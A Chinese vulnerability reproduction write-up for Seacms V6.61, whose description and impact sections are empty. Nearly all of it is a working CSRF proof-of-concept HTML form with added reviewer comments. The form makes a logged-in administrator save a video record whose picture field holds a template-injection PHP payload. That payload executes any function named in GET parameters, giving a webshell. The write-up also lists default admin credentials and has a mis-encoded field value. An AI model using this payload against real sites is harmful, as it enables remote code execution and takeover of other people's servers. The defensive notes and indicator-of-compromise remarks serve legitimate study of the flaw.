
Seacms V6.61 后台 CSRF

一、漏洞简介

二、漏洞影响

三、复现过程

后台地址:http://www.0-sec.org:10089/backend/ ,用户名和密码均为 admin(admin | admin)。CSRF 请求依赖管理员已登录的会话,因此复现前需先登录后台。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <!--
    Purpose: a page whose only content is a form of hidden fields that POSTs
    cross-site to the Seacms backend handler
    admin_video.php?action=save&acttype=add.
    Defender's reading: none of the fields below is an anti-CSRF token, so the
    request carries nothing that a third-party page could not supply.
    NOTE(review): presumably the handler authorises the request on the
    administrator's session cookie alone; confirm against the backend code.
    Server-side controls to verify: a per-session token checked on every
    state-changing backend action, SameSite on the session cookie, and an
    Origin/Referer check.
  -->
  <body>
  <!-- Part of the generated page: replaces the URL shown in the address bar with "/" without reloading. -->
  <script>history.pushState('', '', '/')</script>
  <!-- adjust action to your url -->
  <!-- NOTE(review): host and path here (no port, /seacms/backend/) differ from the backend URL quoted in the text above the listing (port 10089, /backend/). -->
    <form action="http://www.0-sec.org/seacms/backend/admin_video.php?action=save&acttype=add" method="POST">
      <input type="hidden" name="v_commend" value="0" />
      <input type="hidden" name="v_name" value="getshell" />
      <input type="hidden" name="v_enname" value="ceshi" />
      <input type="hidden" name="v_color" value="#FF0000" />
      <input type="hidden" name="v_type" value="5" />
      <input type="hidden" name="v_state" value="5" />
      <!--
        v_pic is the field that matters. Instead of an image path it holds a
        template conditional ({if:...}{end if}) wrapping PHP that calls the
        function named by request parameter "a" with request parameter "b" as
        its argument. '_G'.'ET' builds the name _GET by concatenation,
        presumably so the literal does not appear in the submitted value.
        NOTE(review): this only has an effect if the template engine evaluates
        conditionals found in stored field data. The fix belongs on the server:
        validate v_pic as a URL or path on save, and never evaluate template
        syntax that comes from stored records. A stored picture value of this
        shape is an indicator of compromise worth searching for.
      -->
      <input type="hidden" name="v_pic" value="{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}" />
      <input type="hidden" name="v_spic" value="" />
      <input type="hidden" name="v_gpic" value="" />
      <input type="hidden" name="v_actor" value="" />
      <input type="hidden" name="v_director" value="" />
      <!-- v_commend is sent a second time here (it is also the first field); kept as generated. -->
      <input type="hidden" name="v_commend" value="0" />
      <input type="hidden" name="v_note" value="" />
      <input type="hidden" name="v_tags" value="" />
      <input type="hidden" name="select3" value="" />
      <input type="hidden" name="v_publishyear" value="" />
      <input type="hidden" name="select2" value="" />
      <input type="hidden" name="v_lang" value="" />
      <input type="hidden" name="select1" value="" />
      <input type="hidden" name="v_publisharea" value="" />
      <input type="hidden" name="select4" value="" />
      <input type="hidden" name="v_ver" value="" />
      <input type="hidden" name="v_hit" value="0" />
      <input type="hidden" name="v_monthhit" value="0" />
      <input type="hidden" name="v_weekhit" value="0" />
      <input type="hidden" name="v_dayhit" value="0" />
      <input type="hidden" name="v_len" value="" />
      <input type="hidden" name="v_total" value="" />
      <input type="hidden" name="v_nickname" value="" />
      <input type="hidden" name="v_company" value="" />
      <input type="hidden" name="v_tvs" value="" />
      <input type="hidden" name="v_douban" value="" />
      <input type="hidden" name="v_mtime" value="" />
      <input type="hidden" name="v_imdb" value="" />
      <input type="hidden" name="v_score" value="" />
      <input type="hidden" name="v_scorenum" value="" />
      <input type="hidden" name="v_longtxt" value="" />
      <input type="hidden" name="v_money" value="0" />
      <input type="hidden" name="v_psd" value="" />
      <input type="hidden" name="v_playfrom[1]" value="" />
      <input type="hidden" name="v_playurl[1]" value="" />
      <input type="hidden" name="m_downfrom[1]" value="" />
      <input type="hidden" name="m_downurl[1]" value="" />
      <input type="hidden" name="v_content" value="" />
      <!-- The Submit value below is mis-encoded (mojibake) in this copy; presumably it was a Chinese button label. Left exactly as found. -->
      <input type="hidden" name="Submit" value="�¡®�®š�浜¤" />
      <!-- The only visible control on the page. -->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>